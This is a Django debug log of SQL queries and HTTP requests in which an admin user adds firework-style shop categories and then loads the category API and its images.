(0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:31:04.022969+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 31, 4, 22969, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:31:04,036 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:31:04,042 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:31:04,047 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 6 LIMIT 1; args=(6,) DEBUG 2019-12-13 12:31:04,048 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 6 AND "shop_category"."slug" = 'aerial-explosions') LIMIT 1; args=(6, 'aerial-explosions') DEBUG 2019-12-13 12:31:04,050 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Aerial Explosions' LIMIT 1; args=('Aerial Explosions',) DEBUG 2019-12-13 12:31:04,053 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Aerial Explosions' AND "shop_category"."parent_id" = 6) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Aerial Explosions', 6) DEBUG 2019-12-13 12:31:04,055 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:31:04,056 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 2 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 2, 1, 1] DEBUG 2019-12-13 12:31:04,059 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Aerial Explosions', 6, 'categories/2019/12/13/collection6_4Q1Rpjs.png', 'Aerial Explosions', false, 'aerial-explosions', 2, 3, 2, 1) RETURNING "shop_category"."id"; args=('Aerial Explosions', 6, 'categories/2019/12/13/collection6_4Q1Rpjs.png', 'Aerial Explosions', False, 'aerial-explosions', 2, 3, 2, 1) DEBUG 2019-12-13 12:31:04,061 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T12:31:04.059928+00:00'::timestamptz, 6, 8, '14', 'Aerial Explosions', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 12, 31, 4, 59928, tzinfo=), 6, 8, '14', 'Aerial Explosions', 1, '[{"added": {}}]') [13/Dec/2019 12:31:04] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 12:31:04,317 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:31:04.308424+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 31, 4, 308424, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:31:04,320 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:31:04,365 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:31:04,402 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T12:31:04.400264+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 12, 31, 4, 400264, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 12:31:04] "GET /shop/category/add/ HTTP/1.0" 200 7844 DEBUG 2019-12-13 12:31:04,738 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:31:04.729187+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 31, 4, 729187, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:31:04,742 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 12:31:04] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 12:31:18,104 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:31:18.089456+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 31, 18, 89456, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:31:18,108 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:31:18,118 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:31:18,125 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 6 LIMIT 1; args=(6,) DEBUG 2019-12-13 12:31:18,129 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 6 AND "shop_category"."slug" = 'small-explosions') LIMIT 1; args=(6, 'small-explosions') DEBUG 2019-12-13 12:31:18,132 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Small Explosions' LIMIT 1; args=('Small Explosions',) DEBUG 2019-12-13 12:31:18,137 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Small Explosions' AND "shop_category"."parent_id" = 6) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Small Explosions', 6) DEBUG 2019-12-13 12:31:18,140 utils 11259 139831317362432 (0.001) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(6,) DEBUG 2019-12-13 12:31:18,142 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 7 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 7 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 2 AND ("lft" > 7 OR "rght" > 7); args=[7, 2, 7, 2, 2, 7, 7] DEBUG 2019-12-13 12:31:18,147 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Small Explosions', 6, 'categories/2019/12/13/collection6_YoOFERO.png', 'Small Explosions', false, 'small-explosions', 8, 9, 2, 1) RETURNING "shop_category"."id"; args=('Small Explosions', 6, 'categories/2019/12/13/collection6_YoOFERO.png', 'Small Explosions', False, 'small-explosions', 8, 9, 2, 1) DEBUG 2019-12-13 12:31:18,150 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T12:31:18.148351+00:00'::timestamptz, 6, 8, '15', 'Small Explosions', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 12, 31, 18, 148351, tzinfo=), 6, 8, '15', 'Small Explosions', 1, '[{"added": {}}]') [13/Dec/2019 12:31:18] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 12:31:18,416 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:31:18.401022+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 31, 18, 401022, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:31:18,421 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:31:18,426 utils 11259 139831317362432 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 12:31:18,427 utils 11259 139831317362432 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 12:31:18,436 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-13 12:31:18,631 utils 11259 139831317362432 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T12:31:18.628460+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 12, 31, 18, 628460, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 12:31:18] "GET /shop/category/ HTTP/1.0" 200 8003 DEBUG 2019-12-13 12:31:18,929 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:31:18.918147+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 31, 18, 918147, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:31:18,932 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 12:31:18] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 12:32:27,466 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:32:27,472 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:32:27,475 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:32:27,477 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 12:32:27,480 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 12:32:27,483 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 12:32:27,485 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 12:32:27,488 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:32:27,491 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:32:27,493 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:32:27,496 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:32:27,498 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:32:27,501 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:32:27,503 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:32:27,507 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:32:27] "GET /api/v1/categories/ HTTP/1.0" 200 2595 DEBUG 2019-12-13 12:32:27,546 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:32:27,551 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [13/Dec/2019 12:32:27] "GET /api/v1/categories/6 HTTP/1.0" 200 192 [13/Dec/2019 12:32:28] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [13/Dec/2019 12:32:28] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [13/Dec/2019 12:32:28] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [13/Dec/2019 12:32:28] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [13/Dec/2019 12:35:43] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 12:37:00,841 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:37:00,850 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:37:00,853 utils 11259 139831317362432 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:37:00,859 utils 11259 139831538779904 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:37:00,863 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:37:00,865 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 12:37:00,870 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) [13/Dec/2019 12:37:00] "GET /api/v1/categories/6 HTTP/1.0" 200 192 DEBUG 2019-12-13 12:37:00,875 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 12:37:00,879 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 12:37:00,883 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:37:00,887 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:37:00,891 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:37:00,895 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 